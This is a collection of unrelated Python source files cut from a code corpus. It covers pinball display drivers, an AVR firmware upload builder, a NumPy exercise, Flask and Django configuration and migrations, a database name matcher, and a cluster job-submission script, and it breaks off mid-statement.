        self.platform.run_proc_cmd_no_wait("_dmd_send", data)
class AuxPort:

    """Aux port on the P-Roc."""

    __slots__ = ["platform", "_commands"]

    def __init__(self, platform):
        """Initialise aux port with no reserved command slots."""
        self.platform = platform
        self._commands = []

    def reset(self):
        """Disable the aux program and fill the remaining slots with jumps to 0."""
        commands = [self.platform.pinproc.aux_command_disable()]
        commands += [self.platform.pinproc.aux_command_jump(0)
                     for _ in range(1, 255)]
        self.platform.run_proc_cmd_no_wait("aux_send_commands", 0, commands)

    def reserve_index(self):
        """Reserve the next free command slot and return its index."""
        self._commands.append([])
        return len(self._commands) - 1

    def update(self, index, commands):
        """Store commands in a reserved slot and rewrite the whole program."""
        self._commands[index] = commands
        self._write_commands()

    def _write_commands(self):
        """Write all reserved command slots to the hardware."""
        # disable program
        program = [self.platform.pinproc.aux_command_disable()]

        # build command list from every reserved slot, in order
        for slot in self._commands:
            program += slot

        self.platform.run_proc_cmd_no_wait("aux_send_commands", 0, program)
        # jump from slot 0 to slot 1. overwrites the disable
        self.platform.run_proc_cmd_no_wait(
            "aux_send_commands", 0,
            [self.platform.pinproc.aux_command_jump(1)])
class PRocAlphanumericDisplay(SegmentDisplaySoftwareFlashPlatformInterface):

    """Wrap AuxAlphanumericDisplay (which always updates all four displays) and apply this display's offset."""

    __slots__ = ["display"]

    def __init__(self, display, index):
        """Remember the wrapped aux display and our display index."""
        super().__init__(index)
        self.display = display

    def _set_text(self, text: ColoredSegmentDisplayText):
        """Forward the text for this display index to the aux display."""
        # TODO: use DisplayCharacter and intern dots and commas
        self.display.set_text(text.convert_to_str(), self.number)
class AuxAlphanumericDisplay:

    """An alpha numeric display connected to the aux port on the P-Roc."""

    # 16-bit segment bit patterns per character.
    # Start at ASCII table offset 32: ' '
    ascii_segments = [0x0000,  # ' '
                      0x016a,  # '!' Random Debris Character 1
                      0x3014,  # '"' Random Debris Character 2
                      0x5d80,  # '#' Random Debris Character 3
                      0x00a4,  # '$' Random Debris Character 4
                      0x3270,  # '%' Random Debris Character 5
                      0x4640,  # '&' Random Debris Character 6
                      0x0200,  # '''
                      0x1400,  # '('
                      0x4100,  # ')'
                      0x7f40,  # '*'
                      0x2a40,  # '+'
                      0x8080,  # ','
                      0x0840,  # '-'
                      0x8000,  # '.'
                      0x4400,  # '/'
                      0x003f,  # '0'
                      0x0006,  # '1'
                      0x085b,  # '2'
                      0x084f,  # '3'
                      0x0866,  # '4'
                      0x086d,  # '5'
                      0x087d,  # '6'
                      0x0007,  # '7'
                      0x087f,  # '8'
                      0x086f,  # '9'
                      0x0821,  # ':' Random Debris Character 7
                      0x1004,  # ';' Random Debris Character 8
                      0x1c00,  # '<' Left Arrow
                      0x1386,  # '=' Random Debris Character 9
                      0x4140,  # '>' Right Arrow
                      0x0045,  # '?' Random Debris Character 10
                      0x4820,  # '@' Random Debris Character 11
                      0x0877,  # 'A'
                      0x2a4f,  # 'B'
                      0x0039,  # 'C'
                      0x220f,  # 'D'
                      0x0879,  # 'E'
                      0x0871,  # 'F'
                      0x083d,  # 'G'
                      0x0876,  # 'H'
                      0x2209,  # 'I'
                      0x001e,  # 'J'
                      0x1470,  # 'K'
                      0x0038,  # 'L'
                      0x0536,  # 'M'
                      0x1136,  # 'N'
                      0x003f,  # 'O'
                      0x0873,  # 'P'
                      0x103f,  # 'Q'
                      0x1873,  # 'R'
                      0x086d,  # 'S'
                      0x2201,  # 'T'
                      0x003e,  # 'U'
                      0x4430,  # 'V'
                      0x5036,  # 'W'
                      0x5500,  # 'X'
                      0x2500,  # 'Y'
                      0x4409,  # 'Z'
                      0x6004,  # '[' Random Debris Character 12
                      0x6411,  # '\' Random Debris Character 13
                      0x780a,  # ']' Random Debris Character 14
                      0x093a,  # '^' Random Debris Character 15
                      0x0008,  # '_'
                      0x2220,  # '`' Random Debris Character 16
                      0x0c56,  # 'a' Broken Letter a
                      0x684e,  # 'b' Broken Letter b
                      0x081c,  # 'c' Broken Letter c
                      0x380e,  # 'd' Broken Letter d
                      0x1178,  # 'e' Broken Letter e
                      0x4831,  # 'f' Broken Letter f
                      0x083d,  # 'g' Broken Letter g NOT CREATED YET
                      0x0854,  # 'h' Broken Letter h
                      0x2209,  # 'i' Broken Letter i NOT CREATED YET
                      0x001e,  # 'j' Broken Letter j NOT CREATED YET
                      0x1070,  # 'k' Broken Letter k
                      0x0038,  # 'l' Broken Letter l NOT CREATED YET
                      0x0536,  # 'm' Broken Letter m NOT CREATED YET
                      0x1136,  # 'n' Broken Letter n NOT CREATED YET
                      0x085c,  # 'o' Broken Letter o
                      0x0873,  # 'p' Broken Letter p NOT CREATED YET
                      0x103f,  # 'q' Broken Letter q NOT CREATED YET
                      0x1c72,  # 'r' Broken Letter r
                      0x116c,  # 's' Broken Letter s
                      0x2120,  # 't' Broken Letter t
                      0x003e,  # 'u' Broken Letter u NOT CREATED YET
                      0x4430,  # 'v' Broken Letter v NOT CREATED YET
                      0x5036,  # 'w' Broken Letter w NOT CREATED YET
                      0x5500,  # 'x' Broken Letter x NOT CREATED YET
                      0x2500,  # 'y' Broken Letter y NOT CREATED YET
                      0x4409   # 'z' Broken Letter z NOT CREATED YET
                      ]

    # Aux port enable lines: strobes[0] selects the character position,
    # strobes[1..4] carry the low/high data bytes for the two display pairs.
    strobes = [8, 9, 10, 11, 12]
    full_intensity_delay = 350  # microseconds
    inter_char_delay = 40  # microseconds

    __slots__ = ["platform", "aux_controller", "aux_index", "texts"]

    def __init__(self, platform, aux_controller):
        """Initialise the alphanumeric display and reserve an aux command slot."""
        self.platform = platform
        self.aux_controller = aux_controller
        self.aux_index = aux_controller.reserve_index()
        # One 8-character text per physical display (4 displays total).
        self.texts = [" "] * 4

    def set_text(self, text, index):
        """Set text for display.

        Args:
            text: The text to show; truncated/right-justified to 8 chars.
            index: Which of the four displays (0-3) to update.
        """
        if len(text) != 8:
            text = text[0:8].rjust(8, ' ')
        self.texts[index] = text

        # build expected format: two 16-char strings, one per display pair
        input_strings = [self.texts[0] + self.texts[1], self.texts[2] + self.texts[3]]
        self.display(input_strings)

    def display(self, input_strings, intensities=None):
        """Build and send the aux command program that renders the text.

        Args:
            input_strings: Two 16-character strings (one per display pair).
            intensities: Optional 2x16 per-character intensity values (0..1).
        """
        strings = []

        if intensities is None:
            intensities = [[1] * 16] * 2

        # Make sure strings are at least 16 chars.
        # Then convert each string to a list of chars.
        for j in range(0, 2):
            if len(input_strings[j]) < 16:
                input_strings[j] += ' ' * (16 - len(input_strings[j]))
            strings += [list(input_strings[j])]

        # Make sure intensities are 1 or less
        for i in range(0, 16):
            for j in range(0, 2):
                if intensities[j][i] > 1:
                    intensities[j][i] = 1

        commands = []
        char_on_time = []
        char_off_time = []

        # Initialize a 2x16 array for segments value
        segs = [[0] * 16 for _ in range(2)]

        # Loop through each character
        for i in range(0, 16):
            # Activate the character position (this goes to both displays)
            commands += [self.platform.pinproc.aux_command_output_custom(i, 0, self.strobes[0], False, 0)]

            for j in range(0, 2):
                segs[j][i] = self.ascii_segments[ord(strings[j][i]) - 32]

                # Check for commas or periods.
                # If found, squeeze comma into previous character.
                # No point checking the last character (plus, this avoids an
                # indexing error by not checking i+1 on the 16th char).
                if i < 15:
                    comma_dot = strings[j][i + 1]
                    if comma_dot in (".", ","):
                        segs[j][i] |= self.ascii_segments[ord(comma_dot) - 32]
                        strings[j].remove(comma_dot)

                        # Append a space to ensure there are enough chars.
                        strings[j].append(' ')
                # character is 16 bits long, characters are loaded in 2 lots of 8 bits,
                # for each display (4 enable lines total)
                commands += [self.platform.pinproc.aux_command_output_custom(
                    segs[j][i] & 0xff, 0,
                    self.strobes[j * 2 + 1], False, 0)]  # first 8 bits of character data
                commands += [self.platform.pinproc.aux_command_output_custom(
                    (segs[j][i] >> 8) & 0xff, 0,
                    self.strobes[j * 2 + 2], False, 0)]  # second 8 bits of character data

                char_on_time += [intensities[j][i] * self.full_intensity_delay]
                # NOTE(review): char_on_time grows by one entry per
                # (display, character) pair, yet char_on_time[j] here (and
                # char_on_time[0]/[1] below) only ever read the first two
                # entries -- this looks suspicious; confirm the intended
                # per-character timing behaviour before changing.
                char_off_time += [self.inter_char_delay + (self.full_intensity_delay - char_on_time[j])]

            if char_on_time[0] < char_on_time[1]:
                first = 0
                second = 1
            else:
                first = 1
                second = 0

            # Determine amount of time to leave the other char on after the
            # first is off.
            between_delay = char_on_time[second] - char_on_time[first]

            # Not sure if the hardware will like a delay of 0
            # Use 2 to be extra safe. 2 microseconds won't affect display.
            if between_delay == 0:
                between_delay = 2

            # Delay until it's time to turn off the character with the lowest intensity
            commands += [self.platform.pinproc.aux_command_delay(char_on_time[first])]
            commands += [self.platform.pinproc.aux_command_output_custom(0, 0, self.strobes[first * 2 + 1], False, 0)]
            commands += [self.platform.pinproc.aux_command_output_custom(0, 0, self.strobes[first * 2 + 2], False, 0)]

            # Delay until it's time to turn off the other character.
            commands += [self.platform.pinproc.aux_command_delay(between_delay)]
            commands += [self.platform.pinproc.aux_command_output_custom(0, 0, self.strobes[second * 2 + 1], False, 0)]
            commands += [self.platform.pinproc.aux_command_output_custom(0, 0, self.strobes[second * 2 + 2], False, 0)]

            # Delay for the inter-digit delay.
            commands += [self.platform.pinproc.aux_command_delay(char_off_time[second])]

        # Send the new list of commands to the Aux port controller.
        self.aux_controller.update(self.aux_index, commands)
|
"""
Builder for Atmel AVR series of microcontrollers
"""
from os.path import join
from time import sleep
from SCons.Script import (COMMAND_LINE_TARGETS, AlwaysBuild, Default,
DefaultEnvironment, SConscript)
from platformio.util import get_serialports
def BeforeUpload(target, source, env):  # pylint: disable=W0613,W0621
    """SCons pre-upload hook: prepare the board and the uploader flags.

    Args:
        target: SCons target nodes (unused).
        source: SCons source nodes (unused).
        env: SCons construction environment for the current board.
    """

    def _rpi_sysgpio(path, value):
        # Toggle a Raspberry Pi sysfs GPIO (used to reset a raspduino board).
        with open(path, "w") as f:
            f.write(str(value))

    if "micronucleus" in env['UPLOADER']:
        # Fix: use the print() function instead of the Python-2-only print
        # statement; with a single argument the output is identical on both.
        print("Please unplug/plug device ...")

    upload_options = env.get("BOARD_OPTIONS", {}).get("upload", {})

    if "usb" in env.subst("$UPLOAD_PROTOCOL"):
        # USB uploads need neither a serial port nor a baud rate.
        upload_options['require_upload_port'] = False
        env.Replace(UPLOAD_SPEED=None)

    if env.subst("$UPLOAD_SPEED"):
        env.Append(UPLOADERFLAGS=[
            "-b", "$UPLOAD_SPEED",
            "-D"
        ])

    if not upload_options.get("require_upload_port", False):
        return

    env.AutodetectUploadPort()
    env.Append(UPLOADERFLAGS=["-P", "$UPLOAD_PORT"])

    if env.subst("$BOARD") == "raspduino":
        # Pulse GPIO18 to reset the raspduino before flashing.
        _rpi_sysgpio("/sys/class/gpio/export", 18)
        _rpi_sysgpio("/sys/class/gpio/gpio18/direction", "out")
        _rpi_sysgpio("/sys/class/gpio/gpio18/value", 1)
        sleep(0.1)
        _rpi_sysgpio("/sys/class/gpio/gpio18/value", 0)
        _rpi_sysgpio("/sys/class/gpio/unexport", 18)
    else:
        if not upload_options.get("disable_flushing", False):
            env.FlushSerialBuffer("$UPLOAD_PORT")

        before_ports = [i['port'] for i in get_serialports()]

        if upload_options.get("use_1200bps_touch", False):
            # Opening the port at 1200 baud asks the bootloader to start.
            env.TouchSerialPort("$UPLOAD_PORT", 1200)

        if upload_options.get("wait_for_upload_port", False):
            env.Replace(UPLOAD_PORT=env.WaitForNewSerialPort(before_ports))
env = DefaultEnvironment()

# Pull in the shared AVR build logic before configuring the uploader.
SConscript(env.subst(join("$PIOBUILDER_DIR", "scripts", "baseavr.py")))

if "digispark" in env.get(
        "BOARD_OPTIONS", {}).get("build", {}).get("core", ""):
    # Digispark boards flash over USB with the micronucleus tool.
    env.Replace(
        UPLOADER=join("$PIOPACKAGES_DIR", "tool-micronucleus", "micronucleus"),
        UPLOADERFLAGS=[
            "-c", "$UPLOAD_PROTOCOL",
            "--timeout", "60"
        ],
        UPLOADHEXCMD='"$UPLOADER" $UPLOADERFLAGS $SOURCES'
    )
else:
    # Every other AVR board is flashed with avrdude and the bundled config.
    env.Replace(
        UPLOADER=join("$PIOPACKAGES_DIR", "tool-avrdude", "avrdude"),
        UPLOADERFLAGS=[
            "-v",
            "-p", "$BOARD_MCU",
            "-C",
            '"%s"' % join("$PIOPACKAGES_DIR", "tool-avrdude", "avrdude.conf"),
            "-c", "$UPLOAD_PROTOCOL"
        ],
        UPLOADHEXCMD='"$UPLOADER" $UPLOADERFLAGS -U flash:w:$SOURCES:i',
        UPLOADEEPCMD='"$UPLOADER" $UPLOADERFLAGS -U eeprom:w:$SOURCES:i'
    )

# Build the ELF, then derive the EEPROM and HEX images from it.
target_elf = env.BuildFirmware()

target_eep = env.Alias("eep", env.ElfToEep(join("$BUILD_DIR", "firmware"),
                                           target_elf))

if "uploadlazy" in COMMAND_LINE_TARGETS:
    # "uploadlazy" reuses a previously built firmware.hex instead of rebuilding.
    target_firm = join("$BUILD_DIR", "firmware.hex")
else:
    target_firm = env.ElfToHex(join("$BUILD_DIR", "firmware"), target_elf)

target_size = env.Alias("size", target_elf, "$SIZEPRINTCMD")
AlwaysBuild(target_size)

# Upload targets run BeforeUpload first, then the platform's upload command.
upload = env.Alias(["upload", "uploadlazy"], target_firm,
                   [BeforeUpload, "$UPLOADHEXCMD"])
AlwaysBuild(upload)

uploadeep = env.Alias("uploadeep", target_eep, [
    BeforeUpload, "$UPLOADEEPCMD"])
AlwaysBuild(uploadeep)

Default([target_firm, target_size])
|
"""
[source](https://colab.research.google.com/github/google/eng-edu/blob/main/ml/cc/exercises/numpy_ultraquick_tutorial.ipynb?utm_source=mlcc)
> create/manipulate vectors and matrices
"""
import numpy as np
one_dim_array = np.array([1.3, 3.7, 4.3, 5.6, 7.9])
print(one_dim_array)
two_dim_array = np.array([[1.3, 3.7], [4.3, 5.6], [6.4, 7.9]])
print(two_dim_array)
seq_int = np.arange(3, 9)
print(seq_int)
rand_ints_between_10_and_50 = np.random.randint(low=10, high=51, size=(5))
print(rand_ints_between_10_and_50)
rand_floats_between_0_and_1 = np.random.random([5])
print(rand_floats_between_0_and_1)
rand_floats_between_1_and_2 = rand_floats_between_0_and_1 + 1.0
rand_floats_between_100_and_200 = rand_floats_between_1_and_2 * 100.0
"""
Task.1 Create a Linear Dataset
to create a simple dataset consisting single feature and label
* assign int sequence from 6 to 20 to a NumPy array name 'feature'
* assign 15 values to NumPy array named 'label' as: 'label = (3) (feature) + 4'; as first value be '(3) (6) + 4 = 22'
"""
feature = np.arange(6, 21)
print(feature)
label = (feature * 3) + 4.0
print(label)
"""
Task.2 Add some noise to the dataset
to mae dataset realistic; insert random noise to each element of 'label' array
* modify each value assigned to 'label' by adding different random float between -2/+2 without 'broadcasting'
instead create noise array having same dimension
"""
noise = (np.random.random([15]) * 4)
print(noise)
label = label + noise
print(label)
|
import os
# Absolute path of the directory containing this config module; used below to
# locate the SQLite database files for the testing/production configs.
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
    """Base Flask configuration shared by all environments."""
    # Session-signing secret; falls back to an insecure development default.
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
    # NOTE(review): SQLALCHEMY_COMMIT_ON_TEARDOWN was removed from newer
    # Flask-SQLAlchemy releases -- confirm the installed version honours it.
    SQLALCHEMY_COMMIT_ON_TEARDOWN = True
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    # Outgoing mail: Gmail SMTP with STARTTLS; credentials from environment.
    MAIL_SERVER = 'smtp.googlemail.com'
    MAIL_PORT = 587
    MAIL_USE_TLS = True
    MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
    MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
    PROJECT_MAIL_SUBJECT_PREFIX = '[Project]'
    PROJECT_MAIL_SENDER = 'Project Admin <project@example.com>'
    PROJECT_ADMIN = os.environ.get('PROJECT_ADMIN')
    # Celery broker/result backend (local RabbitMQ).
    CELERY_BROKER_URL = 'amqp://localhost//'
    CELERY_RESULT_BACKEND = 'amqp://'
    CELERY_INCLUDE = ['celery_worker']
    # Database credentials consumed by DevelopmentConfig's connection URI.
    SQL_USERNAME = os.environ.get('MYSQL_USERNAME')
    SQL_PASSWORD = os.environ.get('MYSQL_PASSWORD')

    @staticmethod
    def init_app(app):
        """Hook for environment-specific app initialisation; no-op here."""
        pass
class DevelopmentConfig(Config):
    """Configuration used for local development (local PostgreSQL)."""

    DEBUG = True
    SQLALCHEMY_DATABASE_URI = 'postgresql://{}:{}@localhost/testproject'.format(
        Config.SQL_USERNAME, Config.SQL_PASSWORD)
class TestingConfig(Config):
    """Configuration used by the test suite (SQLite fallback)."""

    TESTING = True
    SQLALCHEMY_DATABASE_URI = (
        os.environ.get('TEST_DATABASE_URL')
        or 'sqlite:///' + os.path.join(basedir, 'data-test.sqlite'))
class ProductionConfig(Config):
    """Production configuration (SQLite fallback when DATABASE_URL is unset)."""

    SQLALCHEMY_DATABASE_URI = (
        os.environ.get('DATABASE_URL')
        or 'sqlite:///' + os.path.join(basedir, 'data.sqlite'))
# Registry mapping environment names to configuration classes; 'default'
# is used when no explicit configuration name is supplied.
config = {
    'development': DevelopmentConfig,
    'testing': TestingConfig,
    'production': ProductionConfig,
    'default': DevelopmentConfig
}
|
"""TailorDev Biblio
Bibliography management with Django.
"""
__version__ = "2.0.0"
default_app_config = "td_biblio.apps.TDBiblioConfig"
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Initial migration: creates the SkipRequest and Video models."""

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='SkipRequest',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('key', models.CharField(max_length=64, verbose_name='Sender Key')),
            ],
            options={
                'verbose_name': 'Skip request',
                'verbose_name_plural': 'Skip requests',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Video',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('description', models.TextField(help_text='Description text for the video', verbose_name='Description', blank=True)),
                ('youtube_url', models.URLField(help_text='URL to a youtube video', verbose_name='Youtube URL')),
                ('key', models.CharField(max_length=64, null=True, verbose_name='Sender Key', blank=True)),
                # NOTE(review): IntegerField with default=False (stored as 0)
                # looks like it was meant to be a BooleanField -- confirm.
                ('deleted', models.IntegerField(default=False, verbose_name='Deleted')),
                ('playing', models.BooleanField(default=False, verbose_name='Playing')),
                ('duration', models.IntegerField(default=0, verbose_name='Duration')),
            ],
            options={
                'verbose_name': 'Video',
                'verbose_name_plural': 'Videos',
            },
            bases=(models.Model,),
        ),
        # Link each skip request to the video it refers to.
        migrations.AddField(
            model_name='skiprequest',
            name='event',
            field=models.ForeignKey(verbose_name='Video', to='manager.Video'),
            preserve_default=True,
        ),
    ]
|
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Adjust Snippet options and tighten several field definitions."""

    dependencies = [
        ('snippets', '0006_snippet_last_used'),
    ]

    operations = [
        # Order snippets by most recently updated first.
        migrations.AlterModelOptions(
            name='snippet',
            options={'ordering': ('-updated_at',), 'verbose_name': 'snippet', 'verbose_name_plural': 'snippets'},
        ),
        migrations.AlterField(
            model_name='snippet',
            name='description',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='description'),
        ),
        migrations.AlterField(
            model_name='snippet',
            name='slug',
            field=models.SlugField(max_length=255, verbose_name='name'),
        ),
        migrations.AlterField(
            model_name='snippet',
            name='updated_at',
            field=models.DateTimeField(blank=True, null=True, verbose_name='updated at'),
        ),
        # Explicit on_delete (required from Django 2.0 onwards).
        migrations.AlterField(
            model_name='snippet',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='snippet', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
import itertools, logging
from gibbs.models import CommonName, Compound, Enzyme
from haystack.query import SearchQuerySet
class Error(Exception):
    """Base class for errors raised by the matcher module."""


class IllegalQueryError(Error):
    """Raised when a query is empty or cannot be parsed."""
class Match(object):
    """A single string match together with its score."""

    def __init__(self, key, value, score):
        """Initialize a Match.

        Args:
            key: the object that matched.
            value: the value of the match (the object pointed to by the key).
            score: between 0.0 and 1.0, higher is better.
        """
        self.key = key
        self.value = value
        self.score = score

    def __eq__(self, other):
        """Equality checking between matches, used for testing."""
        return ((self.key, self.value, self.score) ==
                (other.key, other.value, other.score))

    def __str__(self):
        """Get as a string for debugging/printability."""
        return '<matcher.Match> value=%s, score=%f' % (self.value, self.score)

    def TypeStr(self):
        """Return 'Compound', 'Enzyme' or '' depending on the match type."""
        if self.IsCompound():
            return 'Compound'
        if self.IsEnzyme():
            return 'Enzyme'
        return ''

    def IsCompound(self):
        """True if the matched value is a Compound."""
        return isinstance(self.value, Compound)

    def IsEnzyme(self):
        """True if the matched value is an Enzyme."""
        return isinstance(self.value, Enzyme)

    def Key(self):
        """Return the stable identifier of the matched value, if any."""
        if self.IsCompound():
            return self.value.kegg_id
        if self.IsEnzyme():
            return self.value.ec
        return None
class Matcher(object):
    """A class that matches a string against the database.

    The base implementation does exact matching.
    """

    def __init__(self, max_results=10, min_score=0.0, match_enzymes=True):
        """Initializes the Matcher.

        Args:
            max_results: the maximum number of matches to return.
            min_score: the minimum match score to return.
            match_enzymes: whether to match enzymes as well as compounds.
        """
        self._max_results = max_results
        self._min_score = min_score
        self._match_enzymes = match_enzymes
        # Related objects to prefetch along with matched CommonNames.
        self._prefetch_objects = ['compound_set']
        if self._match_enzymes:
            self._prefetch_objects.extend(['enzyme_set', 'enzyme_set__reactions'])

    def _AcceptQuery(self, query):
        """Accept or reject the query.

        The base implementation accepts any non-blank query.

        Returns:
            True if the query is accepted.
        """
        if query.strip():
            return True
        return False

    def _PreprocessQuery(self, query):
        """Perform pre-search query manipulation.

        Default implementation simply strips leading/trailing whitespace
        and makes the query lowercase.

        Args:
            query: the string query.

        Returns:
            The pre-processed query as a string.
        """
        query = query.strip().lower()
        return query

    # NOTE(review): method name is misspelled ("Prepocess"); renaming would
    # touch any external callers, so it is left as-is here.
    def _PrepocessCandidate(self, candidate):
        """Perform pre-match candidate manipulation.

        Default implementation converts to a lower-case string.

        Args:
            candidate: the candidate object (convertible to a string).

        Returns:
            The pre-processed candidate as a string.
        """
        return str(candidate).strip().lower()

    def _FindNameMatches(self, query):
        """Find all the matches for this query.

        Args:
            query: the query to match.

        Returns:
            A list of CommonName objects matching the query.
        """
        try:
            res = SearchQuerySet().filter(text__exact=query).best_match()
            return [res.object]
        except Exception as e:
            # Best-effort: a failed search simply yields no matches.
            logging.warning('Query failed: ' + str(e))
            return []

    def _MakeMatchObjects(self, common_names):
        """Given the list of CommonNames, make the Matches.

        Args:
            common_names: a list of CommonNames.

        Returns:
            A list of Match objects.
        """
        matches = []
        for name in common_names:
            for compound in name.compound_set.all():
                matches.append(Match(name, compound, 0.0))

            if self._match_enzymes:
                for enzyme in name.enzyme_set.all():
                    matches.append(Match(name, enzyme, 0.0))

        return matches

    def _GetScore(self, query, match):
        """Get the score for a query-match pair.

        Args:
            query: the query string.
            match: the Match object.

        Returns:
            A score between 0.0 and 1.0 (ratio of query length to the
            matched key's length; 1.0 means an exact-length match).
        """
        query_len = float(len(query))
        candidate_len = float(len(str(match.key)))
        return (query_len / candidate_len)

    def _ScoreMatches(self, query, matches):
        """Set the match scores for all matches.

        Args:
            query: the query string.
            matches: a list of match objects with uninitialized scores.
        """
        for m in matches:
            m.score = self._GetScore(query, m)

    def _FilterMatches(self, matches):
        """Filter the match list for min score.

        Args:
            matches: an unfiltered list of match objects.
        """
        # Filter matches without data or beneath the score limit.
        f = lambda match: (match.score >= self._min_score and
                           match.value)
        filtered = filter(f, matches)

        # Take only unique matches.
        # NOTE(review): itertools.groupby only groups *adjacent* items and
        # `filtered` is not sorted by Key() here -- non-adjacent duplicates
        # would survive; confirm matches always arrive grouped by key.
        group_key = lambda match: match.Key()
        filtered_matches = []
        for _, g in itertools.groupby(filtered, key=group_key):
            # Keep the unique match with the top score.
            max_match = None
            for match in g:
                if not max_match or max_match.score < match.score:
                    max_match = match
            filtered_matches.append(max_match)

        return filtered_matches

    def _SortAndClip(self, matches):
        """Sort matches by descending score and keep at most max_results."""
        matches.sort(key=lambda m: m.score, reverse=True)
        return matches[:self._max_results]

    def Match(self, query):
        """Find matches for the query in the library.

        Args:
            query: the string query.

        Returns:
            A sorted list of Match objects or None if
            the query could not be parsed.

        Raises:
            IllegalQueryError: if the query is blank.
        """
        if not self._AcceptQuery(query):
            raise IllegalQueryError('%s is not a valid query' % query)

        processed_query = self._PreprocessQuery(query)
        logging.debug('Query = %s' % processed_query)
        name_matches = self._FindNameMatches(processed_query)
        logging.debug('Found %d name matches' % len(name_matches))

        matches = self._MakeMatchObjects(name_matches)
        self._ScoreMatches(processed_query, matches)
        matches = self._FilterMatches(matches)
        logging.debug('Found %d matches' % len(matches))

        return self._SortAndClip(matches)
|
from sys import version_info
import copy
import types
try:
    from collections import OrderedDict
except ImportError:  # pragma: nocover
    # Django < 1.5 fallback
    from django.utils.datastructures import SortedDict as OrderedDict  # noqa
# Python < 2.7 cannot deepcopy bound methods out of the box; register a
# dispatch handler that rebuilds the method from its function, a deep-copied
# instance and its class. This is a no-op on newer interpreters.
if version_info < (2, 7, 0):
    def _deepcopy_method(x, memo):
        # im_func/im_self/im_class only exist on Python 2 bound methods.
        return type(x)(x.im_func, copy.deepcopy(x.im_self, memo), x.im_class)
    copy._deepcopy_dispatch[types.MethodType] = _deepcopy_method
|
import os, sys, re
import ConfigParser
import optparse
import shutil
import subprocess
import difflib
import collections
def parse_options():
    '''
    Parse the command line arguments and return an optparse options object.

    Exits with a parser error when any of the mandatory options
    (-i, -s, -t) is missing.
    '''
    parser = optparse.OptionParser("pddi.py [--dummy=DUMMY_DIR] -i INPUT_FILE [-o OUTPUT_DIR] [-v]")

    # Directory arguments
    parser.add_option("-i", action="store", type="string", dest="input_file", help="Input crossings file", metavar="INPUT_FILE")
    parser.add_option("-s", action="store", type="string", dest="sif_file", help="Input SIF file")
    parser.add_option("-t", action="store", type="string", dest="type_of_analysis", help="Type of analysis: 'profile_creation' or 'comparison'")
    parser.add_option("--dummy_dir", default="dummy/", action="store", type="string", dest="dummy_dir", help="Dummy directory (default = ./)", metavar="DUMMY_DIR")
    # Bug fix: optparse rejects multi-character short options, so the original
    # '-ws' raised OptionError at startup. Use '-w' plus the correctly
    # spelled '--workspace' long option instead.
    parser.add_option('-w', '--workspace', dest='workspace', action='store',
                      default=os.path.join(os.path.dirname(__file__), 'workspace'),
                      help="""Define the workspace directory where the data directory and the results directory will be created""")

    (options, args) = parser.parse_args()

    if options.input_file is None or options.sif_file is None or options.type_of_analysis is None:
        parser.error("missing arguments: type option \"-h\" for help")

    return options
# Make the script's directory importable so local modules can be loaded.
src_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(src_path)

# Cluster/queue settings are read from config_marvin.ini next to this script.
config = ConfigParser.ConfigParser()
config_file = os.path.join(src_path, "config_marvin.ini")
config.read(config_file)

import hashlib
import functions

python = os.path.join(config.get("Paths", "python_path"), "python")

options = parse_options()
input_file = os.path.abspath(options.input_file)
dummy_dir = os.path.abspath(options.dummy_dir)

logs_dir = src_path + "/logs"
if not os.path.exists(logs_dir):
    os.mkdir(logs_dir)

f = open(input_file, "r")
if options.type_of_analysis == 'profile_creation':
    analysis = '-prof'
    # Collect the set of unique drug identifiers from the crossings file
    # (one "drug1---drug2" pair per line).
    all_drugs = set()
    for line in f:
        (drug1, drug2) = line.strip().split('---')
        all_drugs.add(drug1)
        all_drugs.add(drug2)
    f.close()
    for drug in all_drugs:
        # Check if the p-value file is already created. If so, skip
        # NOTE(review): data_dir is never defined in this script -- this line
        # would raise a NameError; confirm where it should come from.
        pvalue_file = data_dir + "/" + drug + "/guild_results_using_sif/output_scores.sif.netcombo.pval"
        if os.path.exists(pvalue_file):
            continue
        guild_path = '/gpfs42/robbyfs/homes/users/qaguirre/guild/scoreN'
        command = 'python {}/diana_cluster/scripts/generate_profiles.py -d {} -pt geneid -sif {} -gu {}'.format( src_path, drug, options.sif_file, guild_path )
        print(command)
        # python /home/quim/project/diana_cluster/scripts/generate_profiles.py -d 'DCC0303' -pt 'geneid' -sif /home/quim/project/diana_cluster/workspace/sif/human_eAFF_geneid_2017.sif -gu /home/quim/project/diana_cluster/diana/toolbox/scoreN
        # To run the command at the local machine
        #os.system(command)
        #To run in the cluster submitting files to queues
        functions.submit_command_to_queue(command, max_jobs_in_queue=int(config.get("Cluster", "max_jobs_in_queue")), queue_file="command_queues_marvin.txt", dummy_dir=dummy_dir)
elif options.type_of_analysis == 'comparison':
    analysis = '-comp'
    for line in f:
        (drug1, drug2) = line.strip().split('---')
        # Check if the results are already done
        # NOTE(review): res_dir is never defined in this script -- this line
        # would raise a NameError; confirm where it should come from.
        comp_results_dir = res_dir + "/results_" + drug1 + "_" + drug2
        table_file = comp_results_dir + '/table_results_' + drug1 + '_' + drug2 + '.txt'
        if os.path.exists(table_file):
            continue
        command = 'python {}/diana_cluster/scripts/compare_profiles.py -d1 {} -d2 {} -pt geneid'.format( src_path, drug1, drug2 )
        print(command)
        # python /home/quim/project/diana_cluster/scripts/compare_profiles.py -d1 'DCC0303' -d2 'DCC1743' -pt 'geneid'
        # To run the command at the local machine
        #os.system(command)
        #To run in the cluster submitting files to queues
        functions.submit_command_to_queue(command, max_jobs_in_queue=int(config.get("Cluster", "max_jobs_in_queue")), queue_file="command_queues_marvin.txt", dummy_dir=dummy_dir)
    f.close()
else:
